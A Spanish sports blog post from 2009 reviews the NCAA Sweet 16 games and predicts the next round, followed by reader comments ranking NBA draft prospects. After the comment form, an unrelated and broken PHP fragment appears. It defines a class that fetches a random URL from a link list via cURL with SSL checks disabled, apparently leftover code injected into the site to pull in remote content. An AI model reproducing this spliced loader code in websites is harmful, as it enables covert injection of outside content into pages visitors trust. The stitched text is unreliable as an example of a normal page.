Sweet 16 sin sorpresas en la NCAA

28 de March de 2009 por Dantley

No hubo sorpresas en las jornadas de jueves y viernes en las semifinales regionales, conocidas como Sweet-16. Los grandes favoritos Connecticut, Pittsburgh, Louisville y North Carolina pasaron con cierta comodidad, salvo Pittsburgh que fue a remolque gran parte de su partido con Xavier. Más interesantes fueron los partidos entre los segundos espadas, especialmente la exhibición ofensiva de Missouri, que ha presentado su candidatura con un juego de ataque muy fluido.

Repasemos brevemente las ocho eliminatorias, concentrándonos en los dos partidos en los que los favoritos lo tuvieron menos fácil y en la exhibición de Missouri.

Connecticut venció a Purdue 72-60. Sin ser una victoria fácil, dio la impresión de que Connecticut tenía el partido controlado en todo momento. En un partido muy espeso en ataque, la defensa de Connecticut ganó el partido, lo cual suele equivaler en este equipo a otorgar el mérito de la victoria a Hasheem Thabeet. El tanzano es simplemente demasiado grande para la inmensa mayoría de los pivots de la NCAA. 15 puntos, pero sobre todo, 15 rebotes y 4 tapones se quedan incluso cortos para describir la intimidación que supuso Thabeet durante todo el partido. Por lo demás, el correcto base senior A.J. Price y la inesperada aportación de otro senior, Austrie, desde la línea de 3 hicieron el resto.

Pittsburgh estuvo al borde de la eliminación en su partido frente a Xavier. Ya entrada la segunda mitad Xavier llegó a estar 9 arriba. Incluso a falta de menos de un minuto el marcador reflejaba un 54-52 favorable a los mosqueteros de Xavier que Lavance Fields se encargó de solucionar con un triple acompañado unos segundos después por una bandeja. Esos 5 puntos obraron el milagro en un partido en el que los nervios atenazaron a ambos equipos. De los dos potenciales primeras rondas, DeJuan Blair dejó claro que en defensa puede aportar -15 rebotes, 3 robos, 2 tapones-, pero que en ataque sufrirá horrores en la NBA. Sam Young se fue a 19 puntos, siendo de los pocos a los que no les tembló la mano.

El partido MissouriMemphis fue todo lo contrario al anterior. Aquí los ataques se desbocaron, y los nervios se dejaron en el vestuario. Quién sabe, quizá influyó que ambos equipos son conocidos como Tigers. Por tener, el partido tuvo hasta un canastón desde campo propio del novato Denmon. Aunque Memphis pareció intentar remontar el partido, Missouri fue un martillo pilón en ataque, hasta superar la difícil barrera de los 100 puntos en partidos de este nivel. A Memphis no le bastó la experiencia del discreto Dozier -16 rebotes- ni la frescura de un más que probable top-10 como Tyreke Evans -33 puntos-, que si mejora su tiro puede tener una gran carrera en la NBA. Missouri tiró de juego de equipo, con un Tiller inspirado en ataque -23 puntos- y la aportación de rebotes de Lyons con 12.

En el resto de partidos, victoria fácil de Vilanova frente a Duke, con un horrendo partido de Henderson -1 de 14 en tiro- que quizá le haga perder varios puestos en el draft. Louisville, cada vez más favoritos con la pareja WilliamsEarl Clark destrozó a Arizona pese a la buena actuación de Budinger. Michigan St. venció en un partido igualado a Kansas, aunque no vemos a Michigan St. posibilidades de continuar adelante. Y finalmente en la región sur la final esperada se cumple, North Carolina derrotó a Gonzaga con el trío Lawson-Hansbrough-Ellington imparables, y Oklahoma venció a un buen Syracuse, en el que Flynn ratificó su candidatura a pick de lotería, pese a sus limitaciones físicas para jugar de base en la NBA. Por Oklahoma, Griffin volvió a demostrar que está varios niveles por encima de cualquier otro jugador de la NCAA, sencillamente insultante su superioridad, 30 puntos en una serie de 12 de 15 más 14 rebotes. Warren por el contrario, volvió a sembrar dudas.

Nuestras predicciones:

ConnecticutMissouri, sábado 28, 10:40pm hora española: Mucho Connecticut para Missouri al que su juego de equipo no le será suficiente.

PittsburghVilanova, sábado 28, 1:05am (domingo) hora española: Pittsburgh viene de ganar con muchas dificultades. Vilanova venció con cierta facilidad. Puede ser el partido sorpresa con victoria de Vilanova, aunque casi será un cara o cruz.

LousivilleMichigan St., domingo 29 8:20pm hora española – ¡¡ si hemos hecho bien los números del cambio de hora ¡¡: Victoria fácil de Louisville, la pareja Clark – Williams está enchufadísima.

North CarolinaOklahoma, domingo 29 11:05pm hora española: Lástima que no sea un partido de Final Four. Duelo interesantísimo entre el experimentado Hansbrough y la bestia Griffin. Apostamos por el bloque de North Carolina.

Comenta

7 comentarios a esta entrada

  1. Jabho dice:
    #1

    Quitando a Griffin no parece que haya ninguno que pueda marcar diferencias en la NBA. Luego tocará acertar a los que sin ser estrellas si pueden hacer buenas carreras que de esos si hay…

    Partido clave de Warren el de mañana porque Griffin sólo no va a poder contra los Tar Heels

      Citar

  2. JJ5 dice:
    #2

    Gracias por poner los horarios de la siguiente ronda 😉

    El North Carolina-Oklahoma… madre mía.

      Citar

  3. Dantley dice:
    #3

    Pues a ver, que he metido la pata con los cambios de hora, que en USA ya cambiaron:

    Connecticut – Missouri hoy sábado 9:40 de la noche en España
    Pittsburgh – Vilanova hoy sábado 12:05 de esta madrugada de sábado a domingo, así ya aprovecháis y cambiáis el reloj a las 2 en tiempo real

    Louisville – Michigan St. mañana domingo 8:20 pm en España
    North Carolina – Oklahoma mañana domingo 11:05 pm en España

    Se ven todos en http://mmod.ncaa.com/video incluso quien no pueda, en diferido también lo tienen.

      Citar

  4. Dantley dice:
    #4

    El North Carolina – Oklahoma merecerá la pena. Como dice Jabho, en este draft creo que la única estrella es Griffin. El número 2, sea Harden, Thabeet o el que sea, dudo que el año pasado hubiera pasado de un 6 o 7. Thabeet quien sabe, a mí me parece que le falta juego, pero también está claro que desde el primer día va a intimidar. Con que llegue a ser un medioMutombo ya habría cumplido sus expectativas. En la NCAA es demasiada la diferencia física que tiene.

    Lo de Griffin en este partido fue abusivo, y hasta diría que no quiso hacer más sangre. Lo comparan con Boozer, pero le veo más bastante más potencial.

      Citar

  5. kantonyo dice:
    #5

    Estoy de acuerdo en que Blake Griffin está un escalón por encima del resto, por puestos yo veo así a los jugadores más destacados:

    C)
    – Hasheem Thabeet – Uconn
    Podría ser segunda elección del draft después del bajo rendimiento en el Mad Marchness de James Harden y Jordan Hill. Sus 2,20 y su estilizada figura pueden servirle para ser un pivot dominante en la pintura, aunque necesitaría pulirse en el juego y ganar en fuerza. Es uno de los mejores taponadores de los últimos años. Este año además no abundan los buenos pívots como el año pasado.
    – DeJuan Blair – Pitts
    Un pivot bastante rocoso y con gran caracter, mucho lo comparan con Millsap, pero a mi me recuerda a Al Jefferson pero mucho más bajo. Ese es su handicap, sus 2,01 se antojan muy cortos para poder dominar la pintura como lo ha hecho en la NCAA, con 12.4 rebotes de media por partido en 27 minutos.
    – BJ Mullens – Ohio St
    Una de las mayores decepciones del año, aunque no ha tenido muchas oportunidades ni minutos para demostrar su clase, posiblemente debería aguantar un año más en la universidad antes de dar el salto a la NBA.
    PF)
    – Blake Griffin – Oklahoma
    Será el número 1 del draft. Mezcla talento, poder físico y un caracter ganador. Siempre está pidiendo el balón y su sola presencia permite huecos a sus compañeros. Yo apuesto a que triunfará en la NBA, y me encantaría verle de pareja de Marc Gasol en los Grizzlies.
    – Jordan Hill – Arizona
    Los mockdraft le dan como un Top5, a mi no me dice gran cosa las pocas veces que le he visto. Le veo mejor defensor que atacante, es un gran reboteador pero no ha demostrado talento en ataque.
    – Tyler Hansbrough – NC
    El año pasado gano bastantes premios al mejor jugador del año. No entiendo pq no le dan más alto en los mockdrafts, posiblemente por sus 23 años. Tiene un buen tiro de media distancia y es muy versatil en ataque debajo del tablero. No sé si triunfara en la NBA, pero sería un jugador clave en cualquier equipo de Europa. En draftexpress le comparan con Luis Scola o Felipe Reyes.
    SF)
    – Demar DeRozan – USC
    Uno de los mejores Freshman del año. Su final de temporada ha sido espectacular. Ha llevado a los Trojans al campeonate de la PAC-10 y y ha realizado un bueno torneo final teniendo en cuenta la poca calidad de la plantilla de USC. Yo si le veo futuro en la NBA sobre todo por su pogresión.
    – Al-Farouq Aminu – WF
    Otro Freshman con un grandisimo talento. Solo tiene 18 años, se ha abierto hueco gracias alguna muy buenas actuaciones durante la Season, pero al final al igual que Wake Forest, ha defraudado en la post-season tanto en el torneo ACC como en el Marchness. Tiene muy buena pinta pero está muy verde aún, debería esperarse un año más para dar el salto.
    – Earl Clark – Louisville
    Como bien dice draftexpress recuerda bastante a Marvin Williams, puede jugar de Alero como de Ala-pivot. Es el alma mater de los Cardinals, que tan bien los están haciendo este año, y que tienen a tiro entrar en la Final Four. No ha sobresalido lo suficiente por la gran plantilla de los Cardinals, que tienen uno de los mejores quintetos de la NCAA, junto con Terrence Williams, Samardo Samuels y Terrence Jennings.
    – Sam Young – Pitts
    El complemento de Blair en los Panthers. Es el tipico alero anotador. Tiene ya 23 años. Ha tenido un gran final de temporada. Aunque no es nada genoroso y le falta visión de juego, aspecto que deberá mejorar si quiere aspirar a ser algo más que un escudero en la NBA.
    SG)
    – James Harden – Arizona St
    Aspira a ser elegido en top5. Ha sido la gran decepción del torneo final con actuaciones bastante mediocres. El año anterior prometia más que este, por lo que se ha quedado estancado, aunque ha tenido actuaciones sobresalientes con equipos de menor calibre, rozando los triples dobles y anotando más de 30 puntos. Me recuerda a OJ Mayo, jugador mediatico del Pacifico, que promete pero genera ciertas dudas antes de su salto a la NBA.
    – Gerald Henderson – Duke
    Al igual que James Harden, ha tenido un torneo desastroso, sobre todo el partido contra Villanova con 1 de 14 en tiros de campo. Todo indica a que será elegido entre los 15 primeros. Yo como mucho le elegiria en segunda ronda.
    – Willie Warren – Oklahoma
    La pareja ideal de Blake Griffin. Es una de las sorpresas agradables, el jugador de primer año ha demostrado ser un buen tirador, rapido y con gran visión de juego. Posiblemente sea pronto para dar el salto a la NBA, pero Oklahoma el año que viene puede quedarse como una Universidad el montón.
    – Tyreke Evans – Memphis
    Para mi uno de los mejores jugadores del año. Tiene una clase y un estilo de primer nivel. Tenía la dificil tarea de hacer olvidar a Derrick Rose como estrella de los Tigers. A pesar de la eliminación contra Missouri, fue el mejor de su equipo en el torneo. Tiene 19 años y es su primer año en la Universidad. Ha estado involucrado en algun jaleo extradeportivo que le puede hacer perder un buen puesto en el draft.
    – Wayne Ellington – NC
    Junto con Ty Lawson forman la mejor pareja de guards de la NCAA. Es un escolta clasico, anotador, triplista, buena penetración a canasta y bastante participativo. Es dificil destacar en los Tar Heels, por lo que aunque sea elegido en un puesto de final de primera ronda, creo que será un jugador con buen futuro en la NBA.
    PG)
    – Sthepen Curry – Davidson
    Año nefasto para la Universidad de Davidson, que ni siquiera ha podido ganar el torneo de la floja Southern. Curry ha visto como su progresión ha sido frenada por culpa de ello. Aunque sus números siguen siendo de los mejores de la liga. Recuerda bastante a Mike Bibby, tanto fisicamente como en su juego. El año anterior fue una de las atracciones del March Madness. Apuesto a que será un jugador válido en la NBA.
    – Jeff Teague – WF
    Al igual que Aminu, la desastrosa final de temporada de Wake Forest, influirá en su elección. Aunque es uno de los mejores bases del torneo. Buen tiro aunque deberá mejorar en el control y reparto del juego.
    – Ty Lawson – NC
    Para mi el mejor base del campeonato sin lugar a dudas. Debería ser Top 5 aunque nadie lo contempla de esa manera. Es uno de mis jugadores preferido de este año. Es el tipico base bajito explosivo. Gran personalidad, buen organizador y asistente y un buen tiro de tres.
    – Jonny Flynn – Syracuse
    Otro jugador de las caracteristias de Ty Lawson, con mejor manejo de balón pero algo más alocado. Tiene talento aunque está mucho mas verde que el base de los Tar Heels.

    Para mi, pensando en la NBA, el mejor quinteto seria:

    C – Hasheem Thabeet – UConn
    PF – Blake Griffin – Oklahoma
    SF – Demar DeRozan – USC
    SG – Tyreke Evans – Memphis
    PG – Ty Lawson – North Carolina

      Citar

  6. Dantley2 dice:
    #6

    Kantonyo, enorme análisis, conforme se vaya acercando el draft, profundizaremos más en este tema.

    Para mí forzando un poco las posiciones meteria a Curry en vez de Lawson, con todas las dudas sobre su físico. Curry igual lo que tendría que hacer es hincharse a ganar dinero en Grecia, porque no creo que lo escojan más allá del 8 o 10, y en la Euroliga podría ser letal.

      Citar

  7. aro_pasado_no_newtoniano dice:
    #7

    Estos Louisville son telekillos?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>